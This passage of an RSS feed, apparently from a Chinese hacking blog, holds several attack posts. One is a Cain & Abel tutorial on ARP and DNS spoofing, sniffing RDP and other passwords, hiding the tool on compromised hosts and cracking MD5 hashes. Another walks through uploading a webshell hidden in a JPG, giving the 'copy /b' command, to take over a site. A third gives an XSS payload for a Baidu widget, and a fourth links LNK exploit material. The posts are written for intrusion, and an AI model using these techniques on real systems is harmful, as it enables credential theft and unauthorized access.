width="327" onload="javascript:contentimage(this);" height="201" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102058112.jpg" alt="" /></font></div><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>缓存在</span><span>IE</span><span>里的密码全都显示出来了。</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2">二、查看网络状况</font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>切换到&ldquo;网络&rdquo;</span> <span>标签，可以清楚的看到当前网络的结构，我还看到内网其他的机器的共享目录，用户和服务，通过上图，我们清楚的看到</span><span>Smm-DB1</span><span>开启了</span><span>IPC$</span><span>默认共享连接和其他盘隐藏共享。</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>三、</span><span>ARP</span><span>欺骗与嗅探</span></font></font></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>ARP</span><span>欺骗的原理是操纵两台主机的</span><span>ARP</span><span>缓存表，以改变它们之间的正常通信方向，这种通信注入的结果就是</span><span>ARP</span><span>欺骗攻击。</span><span>ARP</span><span>欺骗和嗅探是</span><span>Cain</span><span>我们用的最多的功能了，切换到&ldquo;嗅探&rdquo;标签</span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114507416.jpg" width="382" onload="javascript:contentimage(this);" height="427" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102058833.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>在这里可以清晰的看到内网中各个机器的</span><span>IP</span><span>和</span><span>MAC</span><span>地址。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>我们首先要对</span><span>Cain</span><span>进行配置，先点最单击最上面的&ldquo;配置&rdquo;</span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114502554.jpg" width="380" onload="javascript:contentimage(this);" height="424" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102059140.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">在&ldquo;嗅探</font><font size="2">器&rdquo;中选择要嗅探</font><font size="2">的网卡，在&ldquo;</font></span><font size="2"><span>ARP(Arp Poison Routing)</span><span>&rdquo;中可以伪造</span><span>IP</span><span>地址和</span><span>MAC</span><span>地址进行欺骗，避免被网管发现。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114512685.jpg" width="381" onload="javascript:contentimage(this);" height="425" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102100876.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2">在&ldquo;过滤与端口&rdquo;中可以设置过滤器，</font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114512512.jpg" width="377" onload="javascript:contentimage(this);" height="423" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102100436.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">可以根据自己的需要选择过滤的端口，如</font><font size="2"><u>嗅探</u></font><font size="2">远程桌面密码的话，就钩选</font></span><font size="2"><span>RDP 3389</span><span>端口。</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span style="colors: red"><font size="2">小提示：比如我要</font><font size="2"><u>嗅探</u></font><font size="2">上面的</font></span><font size="2"><span style="colors: red">61.132.223.10</span><span style="colors: red">机器，第二个网卡显示我的</span><span style="colors: red">ip</span><span style="colors: red">地址为</span><span style="colors: red">61.132.223.26</span><span style="colors: red">，和目标机器是同一内网的，就使用第二个的网卡欺骗。</span></font></font></p><span style="colors: red"><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114524752.jpg" width="188" onload="javascript:contentimage(this);" height="42" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102101884.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">单击网卡的那个标志开始</font><font size="2"><u>嗅探</u></font><font size="2">，旁边的放射性标志则是</font></span><font size="2"><span>ARP</span><span>欺骗。</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left">&nbsp;</p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114522557.jpg" onload="javascript:contentimage(this);" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102101954.jpg" alt="" /><br /><br /><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114522344.jpg" onload="javascript:contentimage(this);" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102101572.jpg" alt="" /><br /><br /></font></span></p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">嗅探了</font></span><font size="2"><span>N</span><span>久之后，点击下面的</span> <span>&ldquo;截获密码&rdquo;，嗅探所得到的密码会按分类呈现在大家面前，包括</span><span>http</span><span>、</span><span>ftp</span><span>、</span><span>VNC</span><span>、</span><span>SMTP</span><span>、</span><span>ICQ</span><span>等密码。如果目标主机使用</span><span>voip</span><span>电话的话，还可以获得他使用</span><span>voip</span><span>电话的录音（恐怖吧），如图</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114530283.jpg" onload="javascript:contentimage(this);" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102101148.jpg" alt="" /><br /><br /><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114543274.jpg" onload="javascript:contentimage(this);" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102102521.jpg" alt="" /><br /></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>下面我们来进行</span><span>Arp</span><span>欺骗，点击下面的&ldquo;</span><span>ARP</span><span>&rdquo;标签，</span><span> </span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114544278.jpg" width="480" onload="javascript:contentimage(this);" height="366" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102102660.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>在右边的空白处单击，然后点上面的&ldquo;加号&rdquo;，出现&ldquo;新建</span><span>ARP</span><span>欺骗&rdquo;对话框，在左边选网关，右边选择被欺骗的IP</span><span>。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><font color="#000000" size="2"><span>这里要注意的是，你的机器性能比网关差的话，会引起被欺骗机器变慢。</span></font></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>1．DNS欺骗</span><span>：</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font size="2"><font color="#000000"><span>在&ldquo;</span><span>DNS</span><span>欺骗&rdquo;中填入请求的</span><span>DNS</span><span>名称和响应包的</span><span>IP</span><span>地址，</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114556127.jpg" width="480" onload="javascript:contentimage(this);" height="237" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102102337.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>如图，当目标地址访问</span><span>www.hao123.com</span><span>的时候就自动跳转到</span><span>Www.google.cn</span><span>的网站上面，其中的&ldquo;</span><span>#resp. </span><span>欺骗&rdquo;就是目标主机被欺骗的次数。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">这样对于目标机器进行挂马</font><font size="2">也不失为一种绝妙的方法。</font></span><font size="2"><span>点上面的放射性标志开始</span><span>Arp</span><span>欺骗，</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left">&nbsp;</p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2">小提示：网关IP可以在命令行下输入ipconfig获得</font></span></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114556820.jpg" width="405" onload="javascript:contentimage(this);" height="321" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102102846.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2">如图，网关IP为61.132.223.4</font></span></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2">2.远程桌面欺骗：</font></span></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>Cain</span><span>能够实行中间人攻击（</span><span>Man-In-The-Middle</span><span>）远程计算机的终端服务协议（</span><span>Remote Desktop Protocol RDP</span><span>）进行截获和解密工作。也就是截获目标主机的</span><span>3389</span><span>登陆密码。</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114551633.jpg" width="344" onload="javascript:contentimage(this);" height="136" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102102630.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>在&ldquo;</span><span>ARP-RDP</span><span>&rdquo;里已经得到了</span><span>3</span><span>个数据包。右击右边得到的数据包，选择&ldquo;查看&rdquo;，</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114551178.jpg" width="457" onload="javascript:contentimage(this);" height="321" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102102919.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>我的运气比较好，获得了目标主机登陆</span><span>3389</span><span>的用户和密码，</span><span>如图，用户名为&ldquo;</span><span>administrator</span><span>&rdquo;密码为&ldquo;</span><span>asdf1234</span><span>&rdquo;。</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font color="#000000"><span style="colors: red"><font size="2">小技巧：在肉鸡上对密码进行嗅探</font><font size="2">的时候，可以按</font></span><font size="2"><span>Alt +Delete对界面进行隐藏，按</span><span>Alt + Page Down隐藏都任务栏，按</span><span>Alt +Page up呼出界面。这个技巧在内网渗透的时候非常有用！</span></font></font></p><span><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000"><font size="2">四、密码的破解</font></font></span></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>Cain</span><span>还具有强大的破解功能，可以破解</span><span>md5,md4,pwl,mssql</span><span>等加密的密文，我这里示范如何使用</span><span>Cain破解</span><span>md5</span><span>密文。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114561648.jpg" width="392" onload="javascript:contentimage(this);" height="471" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102103725.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">切换到&ldquo;破解</font><font size="2">器&rdquo;标签，在右边空白处单击，按上面的加号，输入我们要解密</font><font size="2">的</font></span><font size="2"><span>32</span><span>位密文，</span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114563572.jpg" width="373" onload="javascript:contentimage(this);" height="227" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102103319.jpg" alt="" /></font></span></p><p style="margin: 0cm 0cm 0pt"><font color="#000000"><span><font size="2">右击要破解</font><font size="2">的密文，选择&ldquo;暴力破解</font><font size="2">&rdquo;，选择口令长度和密码范围，我这儿选择的是</font></span><font size="2"><span>5</span><span>到</span><span>6</span><span>位纯数字密码。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114565863.jpg" width="500" onload="javascript:contentimage(this);" height="344" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102103195.jpg" alt="" /></font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000"><font size="2">按&ldquo;开始&rdquo;进行破解</font></font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2"><u><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114562152.jpg" width="449" onload="javascript:contentimage(this);" height="100" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102103708.jpg" alt="" /></u></font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font color="#000000"><span><font size="2">一会儿工夫，破解</font><font size="2">出的密码就出现在我们面前了，哈哈，密码是</font></span><font size="2"><span>123456</span><span>。除了暴力破解以外，你还可以使用通过字典破解和通过</span><span>rainbow</span><span>表进行破解。</span></font></font></p><span><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2">其他还有一些常用密码的读取可以参照下图</font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114564860.jpg" width="480" onload="javascript:contentimage(this);" height="446" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102103617.jpg" alt="" /></font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2">使用十分简单，大家自己研究下就行了，密文计算器的效果如图：</font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114572446.jpg" width="480" onload="javascript:contentimage(this);" height="319" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102104192.jpg" alt="" /></font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font size="2"><font color="#000000"><span>可以对密文进行</span><span>md2,md5,lm,nt</span><span>等方式进行加密。</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left">&nbsp;</p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font color="#000000" size="2"><span>五、追踪路由</span></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font size="2"><font color="#000000"><span>切换到&ldquo;追踪路由&rdquo;标签，在目标主机中填入目标主机的</span><span>ip</span><span>或者域名，我这填</span><span>www.hackerxfiles.net</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><span><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114570741.jpg" width="480" onload="javascript:contentimage(this);" height="217" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102104356.jpg" alt="" /></font></span></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font size="2"><font color="#000000"><span>选择协议和端口，点&ldquo;开始&rdquo;，一杯咖啡过后，就可以清晰的看到访问黑</span><span>X<span>&nbsp;&nbsp;</span>BBS</span><span>所经过的所有服务器</span><span>IP</span><span>、访问所需的时间和主机名。</span></font></font></p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left">&nbsp;</p><p style="text-align: left; margin: 0cm 0cm 0pt" align="left"><font size="2"><font color="#000000"><span>另外，</span><span>Cain还具有&ldquo;</span><span>LSA分析&rdquo;和&ldquo;嗅探无线网络&rdquo;等功能，这些功能我们不经常用到，感兴趣的朋友可以自行研究。最新版本</span><span>cain4.92已经加入</span><span>vista支持，但是&ldquo;读取读取缓存密码&rdquo;功能不是很稳定，如果要读取读取缓存密码的话请使用以前的版本。最后要说一句：Cain的确是一款绝佳的黑界利器，威力无穷，请各位小黑们谨慎使用。</span></font></font></p></span></span></span></span></div></div></div></div></div></div>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/397/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=397</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=397&amp;key=5552c60c</trackback:ping></item><item><title>windows快捷方式文件执行漏洞和防御策略</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/396/</link><pubDate>Sat, 24 Jul 2010 22:04:08 +0800</pubDate><guid>http://yezishell.cn/article/396/</guid><description><![CDATA[<p>最近这个漏洞比较火热，简单来说就是恶意构造的快捷方式可以执行文件代码。该漏洞涉及XP、Vista、Win7等几乎所有Windows平台，U盘、手机、数码相机、iPod等所有USB设备都将成为木马病毒的传播通道。才疏学浅+时间有限，具体内容就不谈了，只放些连接上来。</p><p>symantec的一个蠕虫报告：<br />http://www.symantec.com/connect/blogs/w32temphid-usb</p><p>漏洞产生的流程分析：<br />http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx</p><p>exploit-db的漏洞报告和POC：<br />http://www.exploit-db.com/exploits/14403/</p><p>微软漏洞报告及影响环境：<br />http://www.microsoft.com/technet/security/advisory/2286198.mspx</p><p>Metasploit Penetration Testing Framework：<br />http://www.metasploit.com/modules/exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute</p><p>SRP的防御策略：<br />http://blog.didierstevens.com/2010/07/20/mitigating-lnk-exploitation-with-srp/</p><p>didierstevens自己的软件Ariad的防御策略：<br />http://blog.didierstevens.com/2010/07/18/mitigating-lnk-exploitation-with-ariad/</p><p><br />Microsoft Fix it 50486(修复工具)：<br />http://go.microsoft.com/?linkid=9738980<br />此工具有个bug，会使任务栏以及开始菜单的图标变为白色，请酌情使用，或者是等待微软发布正式补丁。</p><p>如果使用上述修复工具出现未知错误，请用此工具撤销修复：<br />http://go.microsoft.com/?linkid=9738981</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/396/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=396</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=396&amp;key=3d2a870a</trackback:ping></item><item><title>新方法突破上传限制</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/395/</link><pubDate>Wed, 21 Jul 2010 18:43:03 +0800</pubDate><guid>http://yezishell.cn/article/395/</guid><description><![CDATA[<p>下午，朋友丢来一个后台，说搞不定，要拿个SHELL。<br />偶进去翻了一下，没发现太多利用的地方，就一个添加文章和上传图片的地方。<br />添加文章直接生成一个ASPX文件，但不知道哪些东西可以写进去，没源码，随便试了下，插了几个代码都没成功，估计不是有过滤就是直接写进库了，于是放弃这条路。<br />来看看上传，上传一个正常的图片可以直接上传，ASP马无论改名与否都直接报错</p><p><a href="http://yezishell.cn/upload/2010/7/201007211907414800.jpg" target="_blank"><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/7/201007211907414800.jpg" width="600" onload="resizepic(this)" height="243" alt="" /></a></p><p><a href="http://yezishell.cn/upload/2010/7/201007211907427887.jpg" target="_blank"><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/7/201007211907427887.jpg" width="469" onload="resizepic(this)" height="464" alt="" />&nbsp;</a>&nbsp;</p><p>看来是检查是不是图片了，这个好办，直接写了个一句话马，找了张正常图片，<br />Copy /b 1.jpg+2.asp 3.asp <br />成功上传，但结果用客户端连接却不成功，不晓得程序还在哪里做了检查。<br />郁闷了半小时，突然灵光一现，想到前段时间听朋友讲的数字水印，可以图片空隙处添加隐藏的水印，那偶们可不可以在图片的空隙处加上一个一句话马呢？<br />马上操刀测试。<a href="http://yezishell.cn/upload/2010/7/201007211907435000.jpg" target="_blank">&nbsp;</a></p><p><a href="http://yezishell.cn/upload/2010/7/201007211907437330.jpg" target="_blank"><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/7/201007211907437330.jpg" width="585" onload="resizepic(this)" height="559" alt="" /></a></p><p>我用c32asm在上面那个小图中空白的区域加了ASPX的一句话马，ASP一句当然也一样的。<br />再上传。<br />成功获得SHELL，突破了网站的限制。</p><p><a href="http://yezishell.cn/upload/2010/7/201007211907440774.jpg" target="_blank"><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/7/201007211907440774.jpg" width="600" onload="resizepic(this)" height="259" alt="" /></a></p><p>最后，一点小经验，GIF的空隙很少，BMP的空隙多但是太大，不适合上传，最好用JPG图片来插了哈，呵呵</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/395/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=395</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=395&amp;key=6400bde1</trackback:ping></item><item><title>百度空间 widget(10624)插件跨站漏洞</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/393/</link><pubDate>Sun, 27 Jun 2010 22:42:03 +0800</pubDate><guid>http://yezishell.cn/article/393/</guid><description><![CDATA[<p>发布日期：2010-06.22&nbsp; <br />发布作者：pz （80vul.com） <br />影响版本：百度空间&nbsp; <br />官方地址： hi.baidu.com <br />漏洞描述：</p><p>一 综述<br />百度模块分享平台(http://act.hi.baidu.com/widget)是百度于2008年8月发布的，借此平台，用户可以方便地升级扩展空间的功能，用户之间还可以将自己制作的模块与别人共享,<br />经过测试发现模块&ldquo;我的豆瓣收藏秀&rdquo;即：http://act.hi.baidu.com/widget/info/10624存在xss漏洞，当攻击者应用该模块，可导致在hi.baidu插入恶意的js/html代码。</p><p>二 PoC</p><p>应用模块: http://act.hi.baidu.com/widget/info/10624</p><p>设置：豆瓣ID:12&quot;&gt;&lt;/object&gt;&lt;img src=2 onerror=alert(document.domain)&gt;&lt;div &quot;</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/393/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=393</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=393&amp;key=2ccf07d0</trackback:ping></item></channel></rss>
